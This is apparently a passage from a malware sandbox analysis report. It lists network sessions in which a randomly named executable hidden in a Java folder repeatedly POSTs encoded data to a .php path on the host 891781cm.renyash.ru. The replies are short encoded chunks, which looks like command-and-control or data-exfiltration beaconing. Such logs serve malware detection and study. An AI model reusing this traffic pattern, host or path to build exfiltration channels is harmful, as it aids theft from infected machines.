                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1999&min_rtt=1756&rtt_var=1146&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=393955&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.4 | 49781 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:02:40.355659962 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 15:02:40.712382078 CET | 1072 | OUT | Data Raw: 55 55 58 53 5f 5b 54 58 55 5a 54 59 51 59 55 52 58 5d 5c 5e 59 56 52 52 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UUXS_[TXUZTYQYURX]\^YVRR][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ +6!;!1-=[*X?Y0B&:$+$?W3<->#?>)#^!'^)/
Jan 1, 2025 15:02:40.826877117 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 15:02:41.078521967 CET | 810 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:41 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F%2BZPadQYIzZmSH%2BIKmM%2FiZbTIigUyq0Ok%2B6BYhoZCiKtPQigjwRZThL4gZnOP6t8zZQct5YQQAwT%2FMA1Itgk6473icH80DmZK14GNzUle3nI2IX3VcrNU9ysVMPv3mDUhDQMAxnQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c64db6d4309-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4664&min_rtt=1688&rtt_var=6585&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=57261&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  41 | 192.168.2.4 | 49782 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:02:40.377151966 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1796
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:40.727986097 CET | 1796 | OUT | Data Raw: 55 56 58 53 5f 5a 51 59 55 5a 54 59 51 5d 55 52 58 5d 5c 59 59 5c 52 5d 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UVXS_ZQYUZTYQ]URX]\YY\R]][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#(![ +!_%5\*.3_'-($=0<;; Z?.<T)<#^!'^)?
                                                                                                                  Jan 1, 2025 15:02:40.832379103 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:41.088488102 CET | 955 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:41 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pjrh1TDiNSKaJP7eh4j72AyIo2V22aywNLijKKQ9EIE2%2BP3snwbjPTP8oG0lRWqgl7B3RSkZPK7Y%2BtPY3r%2FPG7u%2F3nO5mSMltFZfVLTjw4NA5nZUfz0LZJ6h1EGnYdvb9CET3q5C"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c64ea9419c3-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3642&min_rtt=2058&rtt_var=3941&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2140&delivery_rate=99070&cwnd=147&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1e 22 51 24 38 3b 59 28 2d 2a 5c 2d 3f 0d 51 32 3c 22 5d 33 56 3b 00 32 58 3d 14 2e 2b 20 5c 3e 28 30 07 31 2a 03 5a 23 21 2a 11 25 36 2e 5d 04 1d 25 5d 29 04 00 14 2b 2c 2d 5f 3d 32 0e 1b 27 34 3b 59 24 27 3c 5a 24 2e 3e 1f 35 22 38 0d 33 0d 38 57 2a 39 2c 03 24 04 3d 0e 23 10 2e 57 0d 12 21 0c 31 3e 3a 0e 29 32 3b 0b 21 5a 27 53 30 3f 02 0f 33 3f 38 50 23 2b 29 0b 3d 01 23 01 23 24 36 0e 33 04 3b 5b 35 29 2a 04 36 19 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98"Q$8;Y(-*\-?Q2<"]3V;2X=.+ \>(01*Z#!*%6.]%])+,-_=2'4;Y$'<Z$.>5"838W*9,$=#.W!1>:)2;!Z'S0?3?8P#+)=##$63;[5)*6"T /T=VO0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  42 | 192.168.2.4 | 49783 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:02:41.215852976 CET | 320 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1064
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 15:02:41.579030037 CET | 1064 | OUT | Data Raw: 55 56 5d 56 5f 5d 54 5d 55 5a 54 59 51 5b 55 53 58 59 5c 59 59 5d 52 5e 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UV]V_]T]UZTYQ[USXY\YY]R^][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ]<<6#8=X%1Y*3'-4',>33[,+ )<#^!'^)?
                                                                                                                  Jan 1, 2025 15:02:41.659877062 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:41.938122988 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:41 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BPRGsy5pPfRb6ZT%2FO7xiXgHAYCojrgpQOnL0kf%2FySGzQSowYUNvOHud87JdsdVYNFLKVrpDwCz9Ut%2B8dJkf5byBYF%2F1sk4VnVxgZSWm91Q2XCN5mHqHCoaV1anMCsyFGQzxkZxYb"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c6a18c74228-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3126&min_rtt=1748&rtt_var=3412&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1384&delivery_rate=114294&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  43 | 192.168.2.4 | 49784 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:02:42.060158014 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:42.417262077 CET | 1072 | OUT | Data Raw: 50 53 5d 57 5f 5a 54 58 55 5a 54 59 51 59 55 5c 58 5b 5c 59 59 52 52 5a 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PS]W_ZTXUZTYQYU\X[\YYRRZ][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ](1[7-Y%9Y>=<0$:P.B#$133_-.+=4R*<#^!'^)/
                                                                                                                  Jan 1, 2025 15:02:42.507689953 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:42.760242939 CET | 799 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:42 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=haxGsU9JSXSqBKKgyq4417TwYnCqTF72UEeuPrWTrUFQ8deManq2nQGghoZDuQQCaIFPl1OdT3NIfQuo78SKqtFSYJWYH6Fy5obYHTRFh5zYlsu64ig9KvhpZ8h9OJbn8txE0Sto"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c6f6d7dc434-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1767&min_rtt=1506&rtt_var=1088&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=405442&cwnd=195&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  44 | 192.168.2.4 | 49785 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:02:43.015460968 CET | 320 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 15:02:43.368752956 CET | 1072 | OUT | Data Raw: 50 51 58 50 5a 56 54 5d 55 5a 54 59 51 5f 55 56 58 59 5c 54 59 56 52 5d 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PQXPZVT]UZTYQ_UVXY\TYVR]][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#<,)\!(>%%])-(3%-7$Y',2P$?3,>7?7)#^!'^)7
                                                                                                                  Jan 1, 2025 15:02:43.468702078 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:43.732553959 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:43 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wLZYpwD7RPAamt2fM8iNZ%2F%2BNIAPzOLNC5QqAuriraFEiji9EWuP9HLmCK9m%2BCWPaWjCRqsE6H5vA6oui9PLU7TyhcqWzlk6B9Necqj1F%2BUSeyaVVSqmAhAwR8htPU60kybWZcQG8"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c756ad880dc-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4136&min_rtt=1736&rtt_var=5451&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1392&delivery_rate=69736&cwnd=150&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  45 | 192.168.2.4 | 49786 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:02:43.857980013 CET | 320 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 15:02:44.212551117 CET | 1072 | OUT | Data Raw: 50 52 58 56 5f 5c 51 5c 55 5a 54 59 51 59 55 56 58 58 5c 59 59 51 52 5e 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PRXV_\Q\UZTYQYUVXX\YYQR^][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#(/2 1$.))X3X'4=.B$X%/"'/-;<W*#^!'^)/
                                                                                                                  Jan 1, 2025 15:02:44.306744099 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:44.568521023 CET | 804 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:44 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B4kgOHRrtbZHzosJOp9IIbwsahfQWJw7543wsJ4CRMDi0RY7tmSmKFV1Ga8N8KGa%2FYsXWyZVZsGAWnrxkOqMDueOTIzuMLioX57Mgdy%2F2IezRWAmoTJEWUQehH%2BJju1L8l05clN8"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c7a9f93c358-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4653&min_rtt=1683&rtt_var=6571&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1392&delivery_rate=57378&cwnd=154&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  46 | 192.168.2.4 | 49787 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:02:44.700172901 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:45.056160927 CET | 1072 | OUT | Data Raw: 55 56 58 56 5f 5d 51 5d 55 5a 54 59 51 5e 55 5d 58 5d 5c 5d 59 5c 52 52 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UVXV_]Q]UZTYQ^U]X]\]Y\RR][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#)?!;-Y%-%]*.'Z&4P9$,%<5'?3;?U)#^!'^)3
                                                                                                                  Jan 1, 2025 15:02:45.147562027 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:45.397454977 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:45 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vkefpVxbRFKjZ9HWZndndofuJgRTkJ6zQlrdY3kjzw5m7Lo%2FXfp4m5cZShUpkOpPU2ScGf8hTT9F2frzkMZn%2FPrmpd6r%2BsBIQyC9EnyTzPC8SVjSXZfuhH%2FbBa%2FIDIrEUY1UhNgO"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c7fee81f799-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1632&min_rtt=1464&rtt_var=886&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=518650&cwnd=91&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.4 | 49788 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:02:45.533315897 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:45.885040998 CET1072OUTData Raw: 55 53 58 57 5f 5b 51 58 55 5a 54 59 51 5c 55 56 58 5f 5c 5e 59 5d 52 5b 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: USXW_[QXUZTYQ\UVX_\^Y]R[][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ (5 ]-Y$-6*X33$!-7($Y!&<'8^(.0T=<#^!'^)
Jan 1, 2025 15:02:45.978411913 CET | 25 | IN | HTTP/1.1 100 Continue


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.4 | 49789 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:02:46.093919039 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1796
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:46.446762085 CET1796OUTData Raw: 55 57 5d 57 5a 5f 51 5d 55 5a 54 59 51 52 55 51 58 5a 5c 5f 59 5d 52 5f 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UW]WZ_Q]UZTYQRUQXZ\_Y]R_][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#+Y.#"$.5X>#Y34W.4 ^3?*Q$0,.+=.7>#^!'^)
Jan 1, 2025 15:02:46.557146072 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 15:02:46.826323986 CET | 960 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:46 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8ZTefyLZBGrQlVeO%2Fxi7oi%2BGI2%2B1lLeTXhvq6sNUz%2B99AUEhP%2B7uJkLQc1UNH9vY8lTT2%2B4pRwcAAuiK4FkfYzvnnJ4FowKimduftufn7xGNlv7frpoPquXNRD1Crmb886inUOK0"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c88aba97c9f-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
